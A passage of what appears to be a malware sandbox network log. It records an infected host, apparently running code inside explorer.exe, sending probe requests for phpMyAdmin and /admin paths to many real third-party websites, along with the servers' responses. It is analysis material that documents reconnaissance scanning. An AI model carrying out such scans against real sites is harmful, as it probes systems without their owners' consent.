"-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/pma/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
410	192.168.2.6	65205	64.190.63.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.025680065 CET	180	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.424902916 CET	1286	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:16 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UQcCjwhSYZkDPy9aaZoj5PjaJqyIjBdg0XvavgiY4/G1RiRewnb1jQfAvBaTYgX1pz7KEbpIw7E3uAuwXXVt7Q== last-modified: Tue, 20 Feb 2024 23:26:16 GMT x-cache-miss-from: parking-6db66cd898-ccgh8 server: NginX content-encoding: gzip Data Raw: 32 30 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 50 cb 72 da 30 14 fd 15 c5 8b 6e 1a 1e 6e 68 1e 53 cc 8c 01 d3 12 48 82 09 34 38 9b 8e 6c 5d 5b 02 59 72 2c d9 0a 59 f5 37 fa 7b fd 92 ca b0 28 e9 4c 37 ba ba 57 e7 dc 73 8e fa 67 e3 87 d1 2a 5a 04 88 ea 9c 0f fa cd 89 38 16 99 e7 80 70 10 22 58 e3 16 26 31 97 c9 6e 07 7b ef 6e 62 cc 38 8c 6e 67 f2 79 4a eb e4 de 0f 83 e1 30 f4 c7 8f c6 37 8f fe ed d0 bf 17 7b fe 64 3e d5 f3 a8 47 d7 e2 c6 74 2f df c2 59 4c 67 c3 b4 de 4e d6 23 45 26 3c be 5c 91 90 be c6 37 cb cd d3 a6 9a f6 f4 85 9b 7c 94 d7 69 f4 50 77 d4 f5 8b 3b ff ba c8 f0 c5 38 70 e7 1d fd 6d dd 9b 07 f7 77 23 df 04 be 1f 7a de 8f 75 98 8c b6 86 3e 46 cf bb f1 62 7f 83 f1 b3 dc 7e 5e 6c f1 ed cb 7e ba 1d 92 ac bb a9 71 9d b1 a8 d7 f9 ea 2e d9 12 8c 88 dd 6d 98 fa f5 10 af a2 6c e3 16 6f 57 b3 20 2e a6 e6 2a b8 a8 fc ca 6c 36 df f5 95 5d 6c a3 03 26 83 7e 0e 1a a3 84 e2 52 81 f6 9c 4a a7 ad 6b 67 d0 d7 4c 73 18 a8 84 56 4a 55 82 68 59 b6 09 7c 10 b1 2a be b4 8e 65 45 99 42 06 62 c5 34 20 7b 4d 65 89 14 e6 70 f6 0e 75 ba 01 2d 41 c9 aa 4c 40 21 2c 08 9a 0a 4b c9 b1 66 52 b4 fb 9d a3 e0 d1 8d c0 39 78 4e cd c0 14 b2 d4 0e 4a a4 d0 20 ac 3b c3 88 a6 1e 81 9a 25 d0 3a 34 e7 4c 30 cd 30 6f a9 c4 6a 7b 6e bb 7b 9e e3 57 96 57 f9 c9 a4 52 50 1e 5a 1c db 49 d7 79 27 43 40 25 25 2b 1a 1b 27 4a ff 4d 87 fe f9 93 e6 71 6f 53 a1 94 95 4a 1f 82 c5 60 2f c7 a4 07 1e e6 1c c9 14 69 6a c1 7f 33 37 ac df 3f 7f 95 80 b8 94 3b 26 b2 06 db 46 93 52 e6 28 03 01 25 e6 48 cb 82 25 ca 16 94 4b 0b b4 4b 0c c5 ba 61 22 23 2b 4e 10 bc 16 90 e8 06 90 32 ab 4c a1 84 f3 53 87 7f 00 00 00 ff ff 0d 0a 35 37 31 0d 0a 9c 58 5b 6f 9c 46 14 7e ef af 20 89 2c 25 11 ec b2 4e d6 76 a0 e9 43 df 2a b5 52 1f 22 f5 c1 b2 a2 01 86 dd c9 02 83 18 58 7b 43 f9 ef fd e6 c2 75 61 6d 37 56 6c 98 39 e7 cc b9 7c e7 32 28 0d f7 44 58 ac 94 6a ac ac 7f f0 Data Ascii: 20EtPr0nnhSH48l][Yr,Y7{(L7WsgZ8p"X&1n{nb8ngyJ07{d>Gt/YLgN#E&<\7\|iPw;8pmw#zu>Fb~^l~q.mloW .l6]l&~RJkgLsVJUhY\|eEBb4 {Mepu-AL@!,KfR9xNJ ;%:4L00oj{n{WWRPZIy'C@%%+'JMqoSJ`/ij37?;&FR(%H%KKa"#+N2LS571X[oF~ ,%NvCR"X{Cuam7Vl9\|2(DXj
Feb 21, 2024 00:26:16.424915075 CET	1286	IN	Data Raw: ca 73 aa 44 28 96 4e 20 c1 01 82 92 22 dc 1b 5d de c0 4f 09 cb 0e bf 58 e6 5f 41 93 af 6f 19 5c f4 b6 5b 2a 4f 39 5c c8 52 b2 a3 eb 3c db f5 1b fb 82 c6 5f df ae d7 2c dd ad 04 8d 78 4e 0a 69 e3 2a e4 e9 ba a4 69 9e 90 92 8a 75 c2 77 5c ac e5 fe Data Ascii: sD(N "]OX_Ao\[O9\R<_,xNiiuw\wR"*[\|ceoIWv\_?Yxr_<!b=^,)Kol}'NIJGq+m;ynC`cKZ2'#G[ V\|1<Ud;%o
Feb 21, 2024 00:26:16.425404072 CET	1286	IN	Data Raw: 8f 24 3c fd cd 71 a5 38 5d b6 61 44 fa 72 33 e6 d9 5e eb 66 7e 60 d4 49 31 26 91 1d ad bb cb 49 cc 0d 0a 31 32 37 0d 0a 9e 68 e4 9b 9a 85 e9 aa 1f b9 86 2d 6f 1b cb 9f 69 da 9a bc 74 e4 45 45 a5 6d bb 60 c4 4d 6b f9 58 87 79 ec c7 71 fc 62 96 71 Data Ascii: $<q8]aDr3^f~`I1&I127h-oitEEm`MkXyqbqjH/R4Zb)M7_?<s~#.Z)C_P},oRL{G_zGY3Oo. ]nZQGV2"/ZX$\|u1Y[ggQ6[FeC/
Feb 21, 2024 00:26:16.425569057 CET	1286	IN	Data Raw: e6 0e b5 4e 0e 9d bc 7f 4e a9 32 1f 08 97 d7 f0 41 26 05 73 e5 0d ac 73 51 3a 3c 28 b5 bf d9 72 28 74 35 ce e8 6a b0 fc 15 89 a4 a1 88 d9 e0 3b e7 4d a7 9e 96 43 83 e4 5d 8e b6 fb df 13 80 f4 7d 49 fe 7d 3a 8e 94 64 05 c0 dd b5 15 a0 59 33 70 e4 Data Ascii: NN2A&ssQ:<(r(t5j;MC]}I}:dY3pf8r#v$1U6X]~<A-:m{~zc."y:Id2NarD)Jg8`7vjy$MN;%iCve}v.d.mgn&^,
Feb 21, 2024 00:26:16.426117897 CET	1286	IN	Data Raw: 88 96 d2 1f 72 ea d4 70 9a 2c 37 f4 82 85 1c d0 a0 6c 0e 65 be 3d 04 35 d5 47 fe f7 59 7a 19 10 68 99 78 6c 3a ba 8f 4c 27 7d a6 de 5c 35 71 e6 72 c7 27 57 7a b7 49 1e 58 13 d8 0b db 8c 42 9b 76 04 4c 3e 8e 17 36 de 80 db 74 67 d7 88 24 c9 52 14 Data Ascii: rp,7le=5GYzhxl:L'}\5qr'WzIXBvL>6tg$RMuJ_>T%ddj"Zih\|3Zb~Ec_7vU%\|Z:JRES/W#)-8{ vAj;E1r)'6B9P'\|g1'Jks}
Feb 21, 2024 00:26:16.426495075 CET	1286	IN	Data Raw: 77 b3 49 53 29 d1 c5 98 f6 f7 ab ab ab 8e 29 64 f2 d2 87 99 7d 9d cb c2 81 83 ce 75 bd 9b 26 11 56 58 9f 85 27 48 25 47 52 a4 f2 60 49 90 ad ec c7 df c3 92 a2 47 06 05 c8 91 a5 48 6a 64 7b 96 c4 58 4b ff ed 17 a5 2f 8e 54 79 35 c0 12 11 16 dc 6b Data Ascii: wIS))d}u&VX'H%GR`IGHjd{XK/Ty5k(rF\S5Z&\.]9i:8n_J'Gbl&;RYmi4TE}(:VJ&fi3%awrJAYdHq`IM$EzvX9>J
Feb 21, 2024 00:26:16.426595926 CET	854	IN	Data Raw: 91 5d de 7b d5 7d ee 9b 22 ca c4 93 a7 c6 db 86 14 85 d1 db 23 5f 45 45 b9 25 59 55 54 a7 d3 68 a4 d2 6f d2 5a 6a 8f f9 ab 21 d5 d4 c1 e6 a2 75 62 73 bc e9 38 39 eb ea e0 a3 cd 00 bf 04 72 35 47 6b 89 de ab b8 b9 02 5b aa 21 e9 4d 06 b3 28 a5 6d Data Ascii: ]{}"#_EE%YUThoZj!ubs89r5Gk[!M(m_ks~42Xe#?#~Lj1pEA\|RsMZI+#6e"nXYOUOwo7aFEIl"]C}s6'\|?8 +]8{

Session ID	Source IP	Source Port	Destination IP	Destination Port
411	192.168.2.6	65049	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.117243052 CET	174	OUT	GET /pma/ HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.215842962 CET	365	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-149.ec2.internal X-Request-Id: cd959ca4-5528-4026-9114-d8c052c43d6c Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
412	192.168.2.6	65478	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.170641899 CET	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.357928038 CET	431	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Location: https://eskimo.ch/PhpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
413	192.168.2.6	65505	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.201020956 CET	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.381953955 CET	460	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:16 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:FFE1_D5BA2105:0050_65D53518_639066D5:5BC8 x-iplb-instance: 52217 set-cookie: SERVERID77446=2001710\|ZdU1G\|ZdU1G; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
414	192.168.2.6	65506	15.161.71.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.222421885 CET	179	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.403318882 CET	675	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpMyAdmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
415	192.168.2.6	49372	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.244761944 CET	169	OUT	GET /admin HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.340778112 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
416	192.168.2.6	49427	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.264420986 CET	174	OUT	GET /pma/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.392627001 CET	837	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/pma strict-transport-security: max-age=3600 x-wix-request-id: 1708471576.3041477924386124586 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLvRKfhx2uNN4hv3eFGgKFZEa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaliX5nrBf5AVx7TcOVBnRZ6+BiA97cs3Ta7XYUmjmepktQt5GXBLIxSwXETvsBsTpSA==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,alGcl2prlCF8HwMfrZ9rYKH+o92Cjgvs4rLz3S3oAKE=,/j+AjfLiOiE0Vc9NsP8sK7gAAzzliq9iePftiHVq5jlJpdGUXXdihYUPcFwLcUQYLPdrIc1H06/OFwdhz0Sadw== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
417	192.168.2.6	49195	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.269764900 CET	170	OUT	GET /pma/ HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.679388046 CET	371	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.netzschnipsel.de/pma/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
418	192.168.2.6	49343	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.316483021 CET	164	OUT	GET /pma/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.494318008 CET	419	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Location: https://popular.de/pma/ Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
419	192.168.2.6	65359	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.355880022 CET	171	OUT	GET /admin HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.662133932 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:16 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 30 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 Data Ascii: 508<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+[])+(+!+[]+!![])+(+!+[]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventList
Feb 21, 2024 00:26:16.662175894 CET	349	IN	Data Raw: 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 20 20 20 79 3d 66 75 6e 63 74 69 6f 6e 28 79 2c 7a 29 7b 78 28 29 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 Data Ascii: ener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.getElementById('wsidchk').value = west + east;
Feb 21, 2024 00:26:16.662188053 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
420	192.168.2.6	49774	15.197.204.56	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.445152998 CET	165	OUT	GET /admin HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.541589975 CET	215	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin ETag: "65d0dd59-0"
